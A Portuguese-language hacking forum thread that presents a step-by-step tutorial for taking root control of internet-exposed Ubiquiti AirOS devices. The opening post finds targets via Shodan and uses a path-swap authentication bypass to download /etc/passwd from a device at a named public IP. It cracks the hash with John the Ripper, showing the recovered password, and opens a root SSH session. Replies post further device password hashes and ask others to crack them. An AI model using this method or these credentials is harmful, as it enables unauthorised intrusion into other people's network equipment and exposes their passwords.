Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

AirOS Remote Root

Collapse
X
 
  • Filter
  • Tempo
  • Show
Clear All
new posts

  • Font Size
    #1

    Tutorial AirOS Remote Root

    Nesse tutorial vou tentar mostrar como é fácil explorar uma vulnerabilidade no AirOS que nos permite ter acesso root ao servidor.


    Vamos lá.

    O primeiro passo é achar nosso alvo.
    Para isso podemos procurar por /login.cgi?uri=/ no google ou no bing.
    Mas vamos usar o SHODAN.
    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... - Basta pesquisar por airos.

    Nesse exemplo vou usar o servidor Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
    Ao digitarmos isso no browser caímos na página de login Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... e aqui está nossa vulnerabilidade.
    Basta substituirmos /login.cgi?uri=/ por /admin.cgi/sd.css/ e vuala!


    Podemos ver, fazer upload e download de arquivos e executar comandos!
    A partir dai vai da cabeça de vcs. As possibilidades são muitas.

    Mas para continuarmos vamos fazer o download do arquivo /etc/passwd.

    npyoung:Yy.XD7JYyMfXQ:0:0:Administrator:/etc/persistent:/bin/sh

    Agora é so usar o bom e velho John e temos:

    Loaded 1 password hash (Traditional DES [128/128 BS SSE2])
    idola (npyoung)
    guesses: 1 time: 0:00:00:46 (3) c/s: 2713k trying ide52 - idold

    Voltamos a pagina de login e estamos dentro
    Agora é só dar um nmap 207.55.233.246 e perceber:

    PORT STATE SERVICE
    22/tcp open ssh

    Vamos ao putty e conectamos no servidor:

    login as: npyoung
    npyoung@207.55.233.246's password:


    BusyBox v1.11.2 (2011-04-29 17:41:29 EEST) built-in shell (ash)
    Enter 'help' for a list of built-in commands.

    XM.v5.3.2# id
    uid=0(npyoung) gid=0(admin)

    O edu0ox postou uma video aula no forum. Para melhor entendimento
    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

    Vlw. Espero que gostem
    Quanto mais aprendo mais vejo o tamanho da minha ignorânica.
    sigpic
    Similar Threads

  • Font Size
    #2
    Massa so q nao tem como fazer defacer ne vei ?

    Comment


    • Font Size
      #3
      Opa 5k4ll, testei em uns 5 IP diferentes e não consigo mudar de diretorio e nem visualizar os arquivos que eu faço upload, talvez porque o caminho até o arquivo upado esteja incorreto ou porque não tenho permissão para visualizar.

      No caso de não conseguir baixar o /etc/passwd tem algum outro arquivo ou diretório ali dentro que me de a senha atual do AirOS? Nunca mechi nele..... assim consigo visualizar os arquivos que fiz upload.

      E qual diretório custuma ficar os arquivos depois de upados?

      Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... <--- o diretório seria esse suponho, porém não abre e retorna para a página de login /login.cgi?uri=/

      Comment


      • Font Size
        #4
        Boa noite. tenho uma duvida, no john, eu coloko a parte toda ou apenas a primeira parte antes do pontos? exemplo: admin:Ss2pQvEVyyB22:0:0:Administrator:/etc/persistent:/bin/sh
        ou apenas admin:Ss2pQvEVyyB22 ? Tambem aceito se alguem quebrar a senha ai.. kkk, obrigado !

        Comment


        • Font Size
          #5
          Postado Originalmente por yfet Ver Post
          Boa noite. tenho uma duvida, no john, eu coloko a parte toda ou apenas a primeira parte antes do pontos? exemplo: admin:Ss2pQvEVyyB22:0:0:Administrator:/etc/persistent:/bin/sh
          ou apenas admin:Ss2pQvEVyyB22 ? Tambem aceito se alguem quebrar a senha ai.. kkk, obrigado !
          irmao

          cria um arquivo de texto e no seu caso é só colar essa linha completa que o comando /cat/passwd retornou.

          ficando

          admin:Ss2pQvEVyyB22:0:0:Administrator:/etc/persistent:/bin/sh

          dai vc deixa apenas essa linha dentro do arquivo de texto e executa o comando o john:

          john no_do_arquivo_de_texto.txt

          pronto só esperar.

          Comment


          • Font Size
            #6
            quando entro na url com /admin.cgi/sd.css
            da isso
            Error 403 - Forbidden

            You have attempted to access the page, which is forbidden for your account

            In a few seconds you will be redirected to the main page. If you are not redirected, then please click the following link: Main

            Comment


            • Font Size
              #7
              So meio nub aki rsrsrs, mais onde eu baixo esse jonh? (se for um programa é claro) consegui as informações mais nao sei descrptografar tem algum outro modo? tem como descobrir senha de acesso via web pra essa antena? se sim como? respondam por favor, ficaria mto grato!

              Comment


              • Font Size
                #8
                "403"

                Essa versão aqui, eles já devem ter corrigido!
                Mas vlw a ajuda!!!

                Comment


                • Font Size
                  #9
                  Alguem por favor consegue quebrar essa aki...?

                  admin:Ffr7oRZ43YBGM:0:0:Administrator:/etc/persistent:/bin/sh

                  não to conseguindo usar esse john...por favor..

                  Comment


                  • Font Size
                    #10
                    alguem por favor me ajude?
                    não consigo usar esse tal de "john"....

                    admin:Ffr7oRZ43YBGM:0:0:Administrator:/etc/persistent:/bin/sh

                    quebra essas informaçoes ai pra mim por favor...

                    Comment


                    • Font Size
                      #11
                      Ae, eu utilizo o win7 64x e esse jhon n esta funfando :x
                      ao abrir ele ja fecha sozinho n da tempo de fazer nd..'

                      queria saber a senha disso:
                      admin:AaBYkYa13QNTQ:0:0:Administrator:/etc/persistent:/bin/sh

                      se alguem puder quebrar essa!

                      Comment


                      • Font Size
                        #12
                        Ae, eu utilizo o win7 64x e esse jhon n esta funfando :x
                        ao abrir ele ja fecha sozinho n da tempo de fazer nd..'

                        queria saber a senha disso:
                        admin:AaBYkYa13QNTQ:0:0:Administrator:/etc/persistent:/bin/sh

                        se alguem puder quebrar essa!

                        Comment


                        • Font Size
                          #13
                          nao funcionou

                          pra mim nao funcionou ficou na tela de login nao aconteceu nada

                          Comment


                          • Font Size
                            #14
                            possuo windows... qual o comando devo fazer no john, para exibir a senha, depois do download realizado no AIROS?

                            Comment


                            • Font Size
                              #15
                              Nao da certo

                              o meu da nisso Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

                              nao rola !

                              Comment

                              X
                              Working...
                              X